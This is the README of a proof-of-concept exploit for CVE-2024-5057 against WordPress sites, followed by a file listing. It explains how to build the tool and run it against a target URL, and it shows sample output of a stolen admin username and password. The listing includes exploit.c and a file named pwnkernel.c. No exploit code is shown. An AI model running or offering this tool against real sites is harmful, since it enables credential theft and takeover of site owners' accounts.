poc-CVE-2024-5057# About
CVE-2024-5057
Let's try to inject and get the creds.
```bash
cd cve-2024-5057
./configure
make
make install
```
The expoit is installed as `/usr/local/bin/cve-2024-5057`.
So
```bash
cve-2024-5057 https://wp.example.com
```
where `https://wp.example.com` is a target Wordpress site.
# Result output
If the site is not vulnerable:
```text
The site is not vulnerable
```
If the injection succeeded:
```text
username: Admin
password: Secret
```
returning username and password of the WP site admin.
--
**Happy hacking**
[4.0K] /data/pocs/d32e01bb4efda14557ace6414203b2f6fd826ef8
├── [ 460] CMakeLists.txt
├── [1.2M] configure
├── [ 11K] exploit.c
├── [ 764] pwnkernel.c
└── [ 543] README.md
0 directories, 5 files